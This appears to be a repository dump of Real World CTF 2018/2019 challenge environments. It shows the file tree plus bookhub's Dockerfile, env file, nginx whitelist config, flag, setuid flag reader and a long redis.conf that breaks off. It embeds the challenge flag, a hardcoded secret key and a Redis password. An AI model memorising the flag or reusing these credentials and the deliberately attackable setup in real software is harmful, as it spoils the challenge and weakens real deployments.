├── 2018
│   ├── bookhub
│   │   ├── .gitignore
│   │   ├── Dockerfile
│   │   ├── README.md
│   │   ├── conf
│   │   │   ├── .env
│   │   │   └── docker-entrypoint.sh
│   │   ├── docker-compose.yml
│   │   ├── flag
│   │   │   ├── flag
│   │   │   └── readflag.c
│   │   ├── nginx
│   │   │   ├── bookhub.conf
│   │   │   └── white.list
│   │   ├── pwnhub_6672.bsdesign
│   │   ├── redis
│   │   │   └── redis.conf
│   │   ├── rsync-exclude.txt
│   │   └── src
│   │       ├── .gitignore
│   │       ├── app.py
│   │       ├── bookhub
│   │       │   ├── __init__.py
│   │       │   ├── commands.py
│   │       │   ├── forms
│   │       │   │   ├── __init__.py
│   │       │   │   ├── book.py
│   │       │   │   └── user.py
│   │       │   ├── helper.py
│   │       │   ├── models
│   │       │   │   ├── __init__.py
│   │       │   │   ├── book.py
│   │       │   │   └── user.py
│   │       │   ├── static
│   │       │   │   └── css
│   │       │   │       └── login.css
│   │       │   ├── templates
│   │       │   │   ├── _base.html
│   │       │   │   ├── _form.html
│   │       │   │   ├── _pagination.html
│   │       │   │   ├── add.html
│   │       │   │   ├── admin.html
│   │       │   │   ├── edit.html
│   │       │   │   ├── error.html
│   │       │   │   ├── index.html
│   │       │   │   ├── login.html
│   │       │   │   └── system.html
│   │       │   └── views
│   │       │       ├── __init__.py
│   │       │       ├── book.py
│   │       │       └── user.py
│   │       ├── migrations
│   │       │   ├── README
│   │       │   ├── alembic.ini
│   │       │   ├── env.py
│   │       │   ├── script.py.mako
│   │       │   └── versions
│   │       │       ├── b6eb51473869_.py
│   │       │       └── bd31dc4168e1_.py
│   │       └── requirements.txt
│   └── magic_tunnel
│       ├── .dockerignore
│       ├── .gitignore
│       ├── Dockerfile
│       ├── README.md
│       ├── code
│       │   ├── Pipfile
│       │   ├── Pipfile.lock
│       │   └── rwctf
│       │       ├── .gitignore
│       │       ├── manage.py
│       │       ├── rwctf
│       │       │   ├── __init__.py
│       │       │   ├── settings.py
│       │       │   ├── urls.py
│       │       │   └── wsgi.py
│       │       ├── server.sh
│       │       └── xremote
│       │           ├── __init__.py
│       │           ├── admin.py
│       │           ├── apps.py
│       │           ├── forms.py
│       │           ├── migrations
│       │           │   ├── 0001_initial.py
│       │           │   └── __init__.py
│       │           ├── models.py
│       │           ├── templates
│       │           │   └── index.html
│       │           ├── tests.py
│       │           ├── urls.py
│       │           └── views.py
│       ├── docker-compose.yml
│       ├── files
│       │   ├── media
│       │   │   └── .gitkeep
│       │   └── static
│       │       └── .gitkeep
│       ├── flag
│       │   ├── flag
│       │   └── readflag.c
│       ├── nginx
│       │   └── rwctf.conf
│       └── requirements.txt
├── 2019
│   └── crawlbox
│       ├── .gitignore
│       ├── Dockerfile
│       ├── README.md
│       ├── docker-compose.yml
│       ├── docker
│       │   ├── chromedriver.sh
│       │   ├── control.py
│       │   ├── flag_uBd20U0zp1uk
│       │   ├── flask.sh
│       │   ├── nginx-www.conf
│       │   ├── redis.conf
│       │   ├── scrapyd.conf
│       │   └── scrapyd.sh
│       ├── requirements.txt
│       ├── web
│       │   ├── app.py
│       │   └── templates
│       │       └── index.html
│       └── webpage
│           ├── scrapy.cfg
│           ├── setup.py
│           └── webpage
│               ├── __init__.py
│               ├── items.py
│               ├── middlewares.py
│               ├── pipelines.py
│               ├── settings.py
│               └── spiders
│                   ├── __init__.py
│                   └── page.py
└── README.md

/2018/bookhub/.gitignore:
--------------------------------------------------------------------------------
__pycache__
*.pyc
/.idea/
--------------------------------------------------------------------------------
/2018/bookhub/Dockerfile:
--------------------------------------------------------------------------------
FROM python:3.6

LABEL maintainer="phith0n "

COPY src/requirements.txt /tmp/requirements.txt
COPY ./conf/docker-entrypoint.sh /docker-entrypoint.sh
COPY flag/readflag.c /tmp/readflag.c

RUN set -ex \
    && pip install -U -r /tmp/requirements.txt \
    && mkdir /data \
    && gcc /tmp/readflag.c -o /readflag \
    && chmod +x /docker-entrypoint.sh \
    && rm -rf /tmp/requirements.txt /tmp/readflag.c

ENTRYPOINT [ "/docker-entrypoint.sh" ]
WORKDIR /usr/src
EXPOSE 5000

COPY flag/flag /flag
RUN chown root:root /readflag \
    && chmod 755 /readflag \
    && chmod u+s /readflag \
    && chown root:root /flag \
    && chmod 400 /flag

CMD ["gunicorn", "-w", "4", "-b", "0.0.0.0:5000", "-u", "nobody", "-g", "nogroup", "-k", "gevent", "--chdir", "/usr/src", "app:app"]
--------------------------------------------------------------------------------
/2018/bookhub/README.md:
--------------------------------------------------------------------------------
# Real World CTF 2018 Quals - Bookhub

This is my first challenge for the Real World CTF 2018.
--------------------------------------------------------------------------------
/2018/bookhub/conf/.env:
--------------------------------------------------------------------------------
SECRET_KEY=fu629E4cqD23dfkUQrCHm55977cDbwr3zfU3
LC_ALL=C.UTF-8
LANG=C.UTF-8
FLASK_APP=app.py
FLASK_DEBUG=0
DATABASE_URL=sqlite:////data/db.sqlite3
WHITELIST_IPADDRESS=10.0.0.0/8,127.0.0.0/8,172.16.0.0/12,192.168.0.0/16
REDIS_URL=redis://:49n2ezurWRDF@redis:6388/0
--------------------------------------------------------------------------------
/2018/bookhub/conf/docker-entrypoint.sh:
--------------------------------------------------------------------------------
#!/bin/sh
set -e

if [ ! -e /data/db.sqlite3 ]; then
    flask db upgrade
    chown nobody:nogroup /data/db.sqlite3
fi

exec "$@"
--------------------------------------------------------------------------------
/2018/bookhub/docker-compose.yml:
--------------------------------------------------------------------------------
version: '2'
services:
  redis:
    image: redis:4
    command: redis-server /etc/redis/redis.conf
    volumes:
      - ./redis/redis.conf:/etc/redis/redis.conf
  web:
    build: .
    volumes:
      - ./src:/usr/src
    env_file:
      - ./conf/.env
  nginx:
    image: nginx:1
    volumes:
      - ./nginx/bookhub.conf:/etc/nginx/conf.d/bookhub.conf
      - ./src/bookhub/static:/usr/share/nginx/html/static
      - ./nginx/white.list:/etc/nginx/white.list
      - ./source.zip:/usr/share/nginx/html/www.zip
    ports:
      - "8080:8080"
--------------------------------------------------------------------------------
/2018/bookhub/flag/flag:
--------------------------------------------------------------------------------
rwctf{fl4sk_1s_a_M4g1cal_fr4mew0rk_t0000000000}
--------------------------------------------------------------------------------
/2018/bookhub/flag/readflag.c:
--------------------------------------------------------------------------------
#include <stdio.h>

int main () {
    FILE *fp;
    char buff[255];

    fp = fopen("/flag", "r");
    fgets(buff, 255, fp);
    fclose(fp);

    printf("flag: %s\n", buff);

    return 0;
}
--------------------------------------------------------------------------------
/2018/bookhub/nginx/bookhub.conf:
--------------------------------------------------------------------------------
server {
    listen 8080;
    server_name bookhub.pwnhub.cn;
    root /usr/share/nginx/html;

    location @proxy {
        proxy_pass http://web:5000;
        proxy_set_header Host $host:$server_port;
        proxy_set_header X-Forwarded-For $remote_addr;
    }

    location / {
        try_files $uri @proxy;
    }

    location ~ ^/admin {
        include /etc/nginx/white.list;
        deny all;
        try_files $uri @proxy;
    }

    location /static/ {
        expires 12h;
    }

    access_log /var/log/nginx/access.log;
    error_log /var/log/nginx/error.log;
}
--------------------------------------------------------------------------------
/2018/bookhub/nginx/white.list:
--------------------------------------------------------------------------------
allow 127.0.0.1;
allow 172.16.0.0/12;
allow 10.0.0.0/8;
allow 192.168.0.0/16;
--------------------------------------------------------------------------------
/2018/bookhub/pwnhub_6672.bsdesign:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/phith0n/realworldctf/6035cb32a773d28750fbadf2cdab6ac00feafa2c/2018/bookhub/pwnhub_6672.bsdesign
--------------------------------------------------------------------------------
/2018/bookhub/redis/redis.conf:
--------------------------------------------------------------------------------
# Redis configuration file example.
#
# Note that in order to read the configuration file, Redis must be
# started with the file path as first argument:
#
# ./redis-server /path/to/redis.conf

# Note on units: when memory size is needed, it is possible to specify
# it in the usual form of 1k 5GB 4M and so forth:
#
# 1k => 1000 bytes
# 1kb => 1024 bytes
# 1m => 1000000 bytes
# 1mb => 1024*1024 bytes
# 1g => 1000000000 bytes
# 1gb => 1024*1024*1024 bytes
#
# units are case insensitive so 1GB 1Gb 1gB are all the same.

################################## INCLUDES ###################################

# Include one or more other config files here.  This is useful if you
# have a standard template that goes to all Redis servers but also need
# to customize a few per-server settings.  Include files can include
# other files, so use this wisely.
#
# Notice option "include" won't be rewritten by command "CONFIG REWRITE"
# from admin or Redis Sentinel. Since Redis always uses the last processed
# line as value of a configuration directive, you'd better put includes
# at the beginning of this file to avoid overwriting config change at runtime.
#
# If instead you are interested in using includes to override configuration
# options, it is better to use include as the last line.
#
# include /path/to/local.conf
# include /path/to/other.conf

################################## MODULES #####################################

# Load modules at startup. If the server is not able to load modules
# it will abort. It is possible to use multiple loadmodule directives.
#
# loadmodule /path/to/my_module.so
# loadmodule /path/to/other_module.so

################################## NETWORK #####################################

# By default, if no "bind" configuration directive is specified, Redis listens
# for connections from all the network interfaces available on the server.
# It is possible to listen to just one or multiple selected interfaces using
# the "bind" configuration directive, followed by one or more IP addresses.
#
# Examples:
#
# bind 192.168.1.100 10.0.0.1
# bind 127.0.0.1 ::1
#
# ~~~ WARNING ~~~ If the computer running Redis is directly exposed to the
# internet, binding to all the interfaces is dangerous and will expose the
# instance to everybody on the internet. So by default we uncomment the
# following bind directive, that will force Redis to listen only into
# the IPv4 lookback interface address (this means Redis will be able to
# accept connections only from clients running into the same computer it
# is running).
65 | # 66 | # IF YOU ARE SURE YOU WANT YOUR INSTANCE TO LISTEN TO ALL THE INTERFACES 67 | # JUST COMMENT THE FOLLOWING LINE. 68 | # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 69 | bind 0.0.0.0 70 | 71 | # Protected mode is a layer of security protection, in order to avoid that 72 | # Redis instances left open on the internet are accessed and exploited. 73 | # 74 | # When protected mode is on and if: 75 | # 76 | # 1) The server is not binding explicitly to a set of addresses using the 77 | # "bind" directive. 78 | # 2) No password is configured. 79 | # 80 | # The server only accepts connections from clients connecting from the 81 | # IPv4 and IPv6 loopback addresses 127.0.0.1 and ::1, and from Unix domain 82 | # sockets. 83 | # 84 | # By default protected mode is enabled. You should disable it only if 85 | # you are sure you want clients from other hosts to connect to Redis 86 | # even if no authentication is configured, nor a specific set of interfaces 87 | # are explicitly listed using the "bind" directive. 88 | protected-mode yes 89 | 90 | # Accept connections on the specified port, default is 6379 (IANA #815344). 91 | # If port 0 is specified Redis will not listen on a TCP socket. 92 | port 6388 93 | 94 | # TCP listen() backlog. 95 | # 96 | # In high requests-per-second environments you need an high backlog in order 97 | # to avoid slow clients connections issues. Note that the Linux kernel 98 | # will silently truncate it to the value of /proc/sys/net/core/somaxconn so 99 | # make sure to raise both the value of somaxconn and tcp_max_syn_backlog 100 | # in order to get the desired effect. 101 | tcp-backlog 511 102 | 103 | # Unix socket. 104 | # 105 | # Specify the path for the Unix socket that will be used to listen for 106 | # incoming connections. There is no default, so Redis will not listen 107 | # on a unix socket when not specified. 108 | # 109 | # unixsocket /tmp/redis.sock 110 | # unixsocketperm 700 111 | 112 | # Close the connection after a client is idle for N seconds (0 to disable) 113 | timeout 0 114 | 115 | # TCP keepalive. 116 | # 117 | # If non-zero, use SO_KEEPALIVE to send TCP ACKs to clients in absence 118 | # of communication. This is useful for two reasons: 119 | # 120 | # 1) Detect dead peers. 121 | # 2) Take the connection alive from the point of view of network 122 | # equipment in the middle. 123 | # 124 | # On Linux, the specified value (in seconds) is the period used to send ACKs. 125 | # Note that to close the connection the double of the time is needed. 126 | # On other kernels the period depends on the kernel configuration. 127 | # 128 | # A reasonable value for this option is 300 seconds, which is the new 129 | # Redis default starting with Redis 3.2.1. 130 | tcp-keepalive 300 131 | 132 | ################################# GENERAL ##################################### 133 | 134 | # By default Redis does not run as a daemon. Use 'yes' if you need it. 135 | # Note that Redis will write a pid file in /var/run/redis.pid when daemonized. 136 | daemonize no 137 | 138 | # If you run Redis from upstart or systemd, Redis can interact with your 139 | # supervision tree. 
Options: 140 | # supervised no - no supervision interaction 141 | # supervised upstart - signal upstart by putting Redis into SIGSTOP mode 142 | # supervised systemd - signal systemd by writing READY=1 to $NOTIFY_SOCKET 143 | # supervised auto - detect upstart or systemd method based on 144 | # UPSTART_JOB or NOTIFY_SOCKET environment variables 145 | # Note: these supervision methods only signal "process is ready." 146 | # They do not enable continuous liveness pings back to your supervisor. 147 | supervised no 148 | 149 | # If a pid file is specified, Redis writes it where specified at startup 150 | # and removes it at exit. 151 | # 152 | # When the server runs non daemonized, no pid file is created if none is 153 | # specified in the configuration. When the server is daemonized, the pid file 154 | # is used even if not specified, defaulting to "/var/run/redis.pid". 155 | # 156 | # Creating a pid file is best effort: if Redis is not able to create it 157 | # nothing bad happens, the server will start and run normally. 158 | pidfile /var/run/redis_6379.pid 159 | 160 | # Specify the server verbosity level. 161 | # This can be one of: 162 | # debug (a lot of information, useful for development/testing) 163 | # verbose (many rarely useful info, but not a mess like the debug level) 164 | # notice (moderately verbose, what you want in production probably) 165 | # warning (only very important / critical messages are logged) 166 | loglevel notice 167 | 168 | # Specify the log file name. Also the empty string can be used to force 169 | # Redis to log on the standard output. Note that if you use standard 170 | # output for logging but daemonize, logs will be sent to /dev/null 171 | logfile "" 172 | 173 | # To enable logging to the system logger, just set 'syslog-enabled' to yes, 174 | # and optionally update the other syslog parameters to suit your needs. 175 | # syslog-enabled no 176 | 177 | # Specify the syslog identity. 178 | # syslog-ident redis 179 | 180 | # Specify the syslog facility. Must be USER or between LOCAL0-LOCAL7. 181 | # syslog-facility local0 182 | 183 | # Set the number of databases. The default database is DB 0, you can select 184 | # a different one on a per-connection basis using SELECT where 185 | # dbid is a number between 0 and 'databases'-1 186 | databases 16 187 | 188 | # By default Redis shows an ASCII art logo only when started to log to the 189 | # standard output and if the standard output is a TTY. Basically this means 190 | # that normally a logo is displayed only in interactive sessions. 191 | # 192 | # However it is possible to force the pre-4.0 behavior and always show a 193 | # ASCII art logo in startup logs by setting the following option to yes. 194 | always-show-logo yes 195 | 196 | ################################ SNAPSHOTTING ################################ 197 | # 198 | # Save the DB on disk: 199 | # 200 | # save 201 | # 202 | # Will save the DB if both the given number of seconds and the given 203 | # number of write operations against the DB occurred. 204 | # 205 | # In the example below the behaviour will be to save: 206 | # after 900 sec (15 min) if at least 1 key changed 207 | # after 300 sec (5 min) if at least 10 keys changed 208 | # after 60 sec if at least 10000 keys changed 209 | # 210 | # Note: you can disable saving completely by commenting out all "save" lines. 
211 | # 212 | # It is also possible to remove all the previously configured save 213 | # points by adding a save directive with a single empty string argument 214 | # like in the following example: 215 | # 216 | # save "" 217 | 218 | save 900 1 219 | save 300 10 220 | save 60 10000 221 | 222 | # By default Redis will stop accepting writes if RDB snapshots are enabled 223 | # (at least one save point) and the latest background save failed. 224 | # This will make the user aware (in a hard way) that data is not persisting 225 | # on disk properly, otherwise chances are that no one will notice and some 226 | # disaster will happen. 227 | # 228 | # If the background saving process will start working again Redis will 229 | # automatically allow writes again. 230 | # 231 | # However if you have setup your proper monitoring of the Redis server 232 | # and persistence, you may want to disable this feature so that Redis will 233 | # continue to work as usual even if there are problems with disk, 234 | # permissions, and so forth. 235 | stop-writes-on-bgsave-error yes 236 | 237 | # Compress string objects using LZF when dump .rdb databases? 238 | # For default that's set to 'yes' as it's almost always a win. 239 | # If you want to save some CPU in the saving child set it to 'no' but 240 | # the dataset will likely be bigger if you have compressible values or keys. 241 | rdbcompression yes 242 | 243 | # Since version 5 of RDB a CRC64 checksum is placed at the end of the file. 244 | # This makes the format more resistant to corruption but there is a performance 245 | # hit to pay (around 10%) when saving and loading RDB files, so you can disable it 246 | # for maximum performances. 247 | # 248 | # RDB files created with checksum disabled have a checksum of zero that will 249 | # tell the loading code to skip the check. 250 | rdbchecksum yes 251 | 252 | # The filename where to dump the DB 253 | dbfilename dump.rdb 254 | 255 | # The working directory. 256 | # 257 | # The DB will be written inside this directory, with the filename specified 258 | # above using the 'dbfilename' configuration directive. 259 | # 260 | # The Append Only File will also be created inside this directory. 261 | # 262 | # Note that you must specify a directory here, not a file name. 263 | dir ./ 264 | 265 | ################################# REPLICATION ################################# 266 | 267 | # Master-Slave replication. Use slaveof to make a Redis instance a copy of 268 | # another Redis server. A few things to understand ASAP about Redis replication. 269 | # 270 | # 1) Redis replication is asynchronous, but you can configure a master to 271 | # stop accepting writes if it appears to be not connected with at least 272 | # a given number of slaves. 273 | # 2) Redis slaves are able to perform a partial resynchronization with the 274 | # master if the replication link is lost for a relatively small amount of 275 | # time. You may want to configure the replication backlog size (see the next 276 | # sections of this file) with a sensible value depending on your needs. 277 | # 3) Replication is automatic and does not need user intervention. After a 278 | # network partition slaves automatically try to reconnect to masters 279 | # and resynchronize with them. 
280 | # 281 | # slaveof 282 | 283 | # If the master is password protected (using the "requirepass" configuration 284 | # directive below) it is possible to tell the slave to authenticate before 285 | # starting the replication synchronization process, otherwise the master will 286 | # refuse the slave request. 287 | # 288 | # masterauth 289 | 290 | # When a slave loses its connection with the master, or when the replication 291 | # is still in progress, the slave can act in two different ways: 292 | # 293 | # 1) if slave-serve-stale-data is set to 'yes' (the default) the slave will 294 | # still reply to client requests, possibly with out of date data, or the 295 | # data set may just be empty if this is the first synchronization. 296 | # 297 | # 2) if slave-serve-stale-data is set to 'no' the slave will reply with 298 | # an error "SYNC with master in progress" to all the kind of commands 299 | # but to INFO and SLAVEOF. 300 | # 301 | slave-serve-stale-data yes 302 | 303 | # You can configure a slave instance to accept writes or not. Writing against 304 | # a slave instance may be useful to store some ephemeral data (because data 305 | # written on a slave will be easily deleted after resync with the master) but 306 | # may also cause problems if clients are writing to it because of a 307 | # misconfiguration. 308 | # 309 | # Since Redis 2.6 by default slaves are read-only. 310 | # 311 | # Note: read only slaves are not designed to be exposed to untrusted clients 312 | # on the internet. It's just a protection layer against misuse of the instance. 313 | # Still a read only slave exports by default all the administrative commands 314 | # such as CONFIG, DEBUG, and so forth. To a limited extent you can improve 315 | # security of read only slaves using 'rename-command' to shadow all the 316 | # administrative / dangerous commands. 317 | slave-read-only yes 318 | 319 | # Replication SYNC strategy: disk or socket. 320 | # 321 | # ------------------------------------------------------- 322 | # WARNING: DISKLESS REPLICATION IS EXPERIMENTAL CURRENTLY 323 | # ------------------------------------------------------- 324 | # 325 | # New slaves and reconnecting slaves that are not able to continue the replication 326 | # process just receiving differences, need to do what is called a "full 327 | # synchronization". An RDB file is transmitted from the master to the slaves. 328 | # The transmission can happen in two different ways: 329 | # 330 | # 1) Disk-backed: The Redis master creates a new process that writes the RDB 331 | # file on disk. Later the file is transferred by the parent 332 | # process to the slaves incrementally. 333 | # 2) Diskless: The Redis master creates a new process that directly writes the 334 | # RDB file to slave sockets, without touching the disk at all. 335 | # 336 | # With disk-backed replication, while the RDB file is generated, more slaves 337 | # can be queued and served with the RDB file as soon as the current child producing 338 | # the RDB file finishes its work. With diskless replication instead once 339 | # the transfer starts, new slaves arriving will be queued and a new transfer 340 | # will start when the current one terminates. 341 | # 342 | # When diskless replication is used, the master waits a configurable amount of 343 | # time (in seconds) before starting the transfer in the hope that multiple slaves 344 | # will arrive and the transfer can be parallelized. 
345 | # 346 | # With slow disks and fast (large bandwidth) networks, diskless replication 347 | # works better. 348 | repl-diskless-sync no 349 | 350 | # When diskless replication is enabled, it is possible to configure the delay 351 | # the server waits in order to spawn the child that transfers the RDB via socket 352 | # to the slaves. 353 | # 354 | # This is important since once the transfer starts, it is not possible to serve 355 | # new slaves arriving, that will be queued for the next RDB transfer, so the server 356 | # waits a delay in order to let more slaves arrive. 357 | # 358 | # The delay is specified in seconds, and by default is 5 seconds. To disable 359 | # it entirely just set it to 0 seconds and the transfer will start ASAP. 360 | repl-diskless-sync-delay 5 361 | 362 | # Slaves send PINGs to server in a predefined interval. It's possible to change 363 | # this interval with the repl_ping_slave_period option. The default value is 10 364 | # seconds. 365 | # 366 | # repl-ping-slave-period 10 367 | 368 | # The following option sets the replication timeout for: 369 | # 370 | # 1) Bulk transfer I/O during SYNC, from the point of view of slave. 371 | # 2) Master timeout from the point of view of slaves (data, pings). 372 | # 3) Slave timeout from the point of view of masters (REPLCONF ACK pings). 373 | # 374 | # It is important to make sure that this value is greater than the value 375 | # specified for repl-ping-slave-period otherwise a timeout will be detected 376 | # every time there is low traffic between the master and the slave. 377 | # 378 | # repl-timeout 60 379 | 380 | # Disable TCP_NODELAY on the slave socket after SYNC? 381 | # 382 | # If you select "yes" Redis will use a smaller number of TCP packets and 383 | # less bandwidth to send data to slaves. But this can add a delay for 384 | # the data to appear on the slave side, up to 40 milliseconds with 385 | # Linux kernels using a default configuration. 386 | # 387 | # If you select "no" the delay for data to appear on the slave side will 388 | # be reduced but more bandwidth will be used for replication. 389 | # 390 | # By default we optimize for low latency, but in very high traffic conditions 391 | # or when the master and slaves are many hops away, turning this to "yes" may 392 | # be a good idea. 393 | repl-disable-tcp-nodelay no 394 | 395 | # Set the replication backlog size. The backlog is a buffer that accumulates 396 | # slave data when slaves are disconnected for some time, so that when a slave 397 | # wants to reconnect again, often a full resync is not needed, but a partial 398 | # resync is enough, just passing the portion of data the slave missed while 399 | # disconnected. 400 | # 401 | # The bigger the replication backlog, the longer the time the slave can be 402 | # disconnected and later be able to perform a partial resynchronization. 403 | # 404 | # The backlog is only allocated once there is at least a slave connected. 405 | # 406 | # repl-backlog-size 1mb 407 | 408 | # After a master has no longer connected slaves for some time, the backlog 409 | # will be freed. The following option configures the amount of seconds that 410 | # need to elapse, starting from the time the last slave disconnected, for 411 | # the backlog buffer to be freed. 412 | # 413 | # Note that slaves never free the backlog for timeout, since they may be 414 | # promoted to masters later, and should be able to correctly "partially 415 | # resynchronize" with the slaves: hence they should always accumulate backlog. 
416 | # 417 | # A value of 0 means to never release the backlog. 418 | # 419 | # repl-backlog-ttl 3600 420 | 421 | # The slave priority is an integer number published by Redis in the INFO output. 422 | # It is used by Redis Sentinel in order to select a slave to promote into a 423 | # master if the master is no longer working correctly. 424 | # 425 | # A slave with a low priority number is considered better for promotion, so 426 | # for instance if there are three slaves with priority 10, 100, 25 Sentinel will 427 | # pick the one with priority 10, that is the lowest. 428 | # 429 | # However a special priority of 0 marks the slave as not able to perform the 430 | # role of master, so a slave with priority of 0 will never be selected by 431 | # Redis Sentinel for promotion. 432 | # 433 | # By default the priority is 100. 434 | slave-priority 100 435 | 436 | # It is possible for a master to stop accepting writes if there are less than 437 | # N slaves connected, having a lag less or equal than M seconds. 438 | # 439 | # The N slaves need to be in "online" state. 440 | # 441 | # The lag in seconds, that must be <= the specified value, is calculated from 442 | # the last ping received from the slave, that is usually sent every second. 443 | # 444 | # This option does not GUARANTEE that N replicas will accept the write, but 445 | # will limit the window of exposure for lost writes in case not enough slaves 446 | # are available, to the specified number of seconds. 447 | # 448 | # For example to require at least 3 slaves with a lag <= 10 seconds use: 449 | # 450 | # min-slaves-to-write 3 451 | # min-slaves-max-lag 10 452 | # 453 | # Setting one or the other to 0 disables the feature. 454 | # 455 | # By default min-slaves-to-write is set to 0 (feature disabled) and 456 | # min-slaves-max-lag is set to 10. 457 | 458 | # A Redis master is able to list the address and port of the attached 459 | # slaves in different ways. For example the "INFO replication" section 460 | # offers this information, which is used, among other tools, by 461 | # Redis Sentinel in order to discover slave instances. 462 | # Another place where this info is available is in the output of the 463 | # "ROLE" command of a master. 464 | # 465 | # The listed IP and address normally reported by a slave is obtained 466 | # in the following way: 467 | # 468 | # IP: The address is auto detected by checking the peer address 469 | # of the socket used by the slave to connect with the master. 470 | # 471 | # Port: The port is communicated by the slave during the replication 472 | # handshake, and is normally the port that the slave is using to 473 | # list for connections. 474 | # 475 | # However when port forwarding or Network Address Translation (NAT) is 476 | # used, the slave may be actually reachable via different IP and port 477 | # pairs. The following two options can be used by a slave in order to 478 | # report to its master a specific set of IP and port, so that both INFO 479 | # and ROLE will report those values. 480 | # 481 | # There is no need to use both the options if you need to override just 482 | # the port or the IP address. 483 | # 484 | # slave-announce-ip 5.5.5.5 485 | # slave-announce-port 1234 486 | 487 | ################################## SECURITY ################################### 488 | 489 | # Require clients to issue AUTH before processing any other 490 | # commands. This might be useful in environments in which you do not trust 491 | # others with access to the host running redis-server. 
492 | # 493 | # This should stay commented out for backward compatibility and because most 494 | # people do not need auth (e.g. they run their own servers). 495 | # 496 | # Warning: since Redis is pretty fast an outside user can try up to 497 | # 150k passwords per second against a good box. This means that you should 498 | # use a very strong password otherwise it will be very easy to break. 499 | # 500 | requirepass 49n2ezurWRDF 501 | 502 | # Command renaming. 503 | # 504 | # It is possible to change the name of dangerous commands in a shared 505 | # environment. For instance the CONFIG command may be renamed into something 506 | # hard to guess so that it will still be available for internal-use tools 507 | # but not available for general clients. 508 | # 509 | # Example: 510 | # 511 | # rename-command CONFIG b840fc02d524045429941cc15f59e41cb7be6c52 512 | # 513 | # It is also possible to completely kill a command by renaming it into 514 | # an empty string: 515 | # 516 | # rename-command CONFIG "" 517 | # 518 | # Please note that changing the name of commands that are logged into the 519 | # AOF file or transmitted to slaves may cause problems. 520 | rename-command CONFIG "" 521 | 522 | ################################### CLIENTS #################################### 523 | 524 | # Set the max number of connected clients at the same time. By default 525 | # this limit is set to 10000 clients, however if the Redis server is not 526 | # able to configure the process file limit to allow for the specified limit 527 | # the max number of allowed clients is set to the current file limit 528 | # minus 32 (as Redis reserves a few file descriptors for internal uses). 529 | # 530 | # Once the limit is reached Redis will close all the new connections sending 531 | # an error 'max number of clients reached'. 532 | # 533 | # maxclients 10000 534 | 535 | ############################## MEMORY MANAGEMENT ################################ 536 | 537 | # Set a memory usage limit to the specified amount of bytes. 538 | # When the memory limit is reached Redis will try to remove keys 539 | # according to the eviction policy selected (see maxmemory-policy). 540 | # 541 | # If Redis can't remove keys according to the policy, or if the policy is 542 | # set to 'noeviction', Redis will start to reply with errors to commands 543 | # that would use more memory, like SET, LPUSH, and so on, and will continue 544 | # to reply to read-only commands like GET. 545 | # 546 | # This option is usually useful when using Redis as an LRU or LFU cache, or to 547 | # set a hard memory limit for an instance (using the 'noeviction' policy). 548 | # 549 | # WARNING: If you have slaves attached to an instance with maxmemory on, 550 | # the size of the output buffers needed to feed the slaves are subtracted 551 | # from the used memory count, so that network problems / resyncs will 552 | # not trigger a loop where keys are evicted, and in turn the output 553 | # buffer of slaves is full with DELs of keys evicted triggering the deletion 554 | # of more keys, and so forth until the database is completely emptied. 555 | # 556 | # In short... if you have slaves attached it is suggested that you set a lower 557 | # limit for maxmemory so that there is some free RAM on the system for slave 558 | # output buffers (but this is not needed if the policy is 'noeviction'). 559 | # 560 | # maxmemory 561 | 562 | # MAXMEMORY POLICY: how Redis will select what to remove when maxmemory 563 | # is reached. 
You can select among five behaviors: 564 | # 565 | # volatile-lru -> Evict using approximated LRU among the keys with an expire set. 566 | # allkeys-lru -> Evict any key using approximated LRU. 567 | # volatile-lfu -> Evict using approximated LFU among the keys with an expire set. 568 | # allkeys-lfu -> Evict any key using approximated LFU. 569 | # volatile-random -> Remove a random key among the ones with an expire set. 570 | # allkeys-random -> Remove a random key, any key. 571 | # volatile-ttl -> Remove the key with the nearest expire time (minor TTL) 572 | # noeviction -> Don't evict anything, just return an error on write operations. 573 | # 574 | # LRU means Least Recently Used 575 | # LFU means Least Frequently Used 576 | # 577 | # Both LRU, LFU and volatile-ttl are implemented using approximated 578 | # randomized algorithms. 579 | # 580 | # Note: with any of the above policies, Redis will return an error on write 581 | # operations, when there are no suitable keys for eviction. 582 | # 583 | # At the date of writing these commands are: set setnx setex append 584 | # incr decr rpush lpush rpushx lpushx linsert lset rpoplpush sadd 585 | # sinter sinterstore sunion sunionstore sdiff sdiffstore zadd zincrby 586 | # zunionstore zinterstore hset hsetnx hmset hincrby incrby decrby 587 | # getset mset msetnx exec sort 588 | # 589 | # The default is: 590 | # 591 | # maxmemory-policy noeviction 592 | 593 | # LRU, LFU and minimal TTL algorithms are not precise algorithms but approximated 594 | # algorithms (in order to save memory), so you can tune it for speed or 595 | # accuracy. For default Redis will check five keys and pick the one that was 596 | # used less recently, you can change the sample size using the following 597 | # configuration directive. 598 | # 599 | # The default of 5 produces good enough results. 10 Approximates very closely 600 | # true LRU but costs more CPU. 3 is faster but not very accurate. 601 | # 602 | # maxmemory-samples 5 603 | 604 | ############################# LAZY FREEING #################################### 605 | 606 | # Redis has two primitives to delete keys. One is called DEL and is a blocking 607 | # deletion of the object. It means that the server stops processing new commands 608 | # in order to reclaim all the memory associated with an object in a synchronous 609 | # way. If the key deleted is associated with a small object, the time needed 610 | # in order to execute the DEL command is very small and comparable to most other 611 | # O(1) or O(log_N) commands in Redis. However if the key is associated with an 612 | # aggregated value containing millions of elements, the server can block for 613 | # a long time (even seconds) in order to complete the operation. 614 | # 615 | # For the above reasons Redis also offers non blocking deletion primitives 616 | # such as UNLINK (non blocking DEL) and the ASYNC option of FLUSHALL and 617 | # FLUSHDB commands, in order to reclaim memory in background. Those commands 618 | # are executed in constant time. Another thread will incrementally free the 619 | # object in the background as fast as possible. 620 | # 621 | # DEL, UNLINK and ASYNC option of FLUSHALL and FLUSHDB are user-controlled. 622 | # It's up to the design of the application to understand when it is a good 623 | # idea to use one or the other. However the Redis server sometimes has to 624 | # delete keys or flush the whole database as a side effect of other operations. 
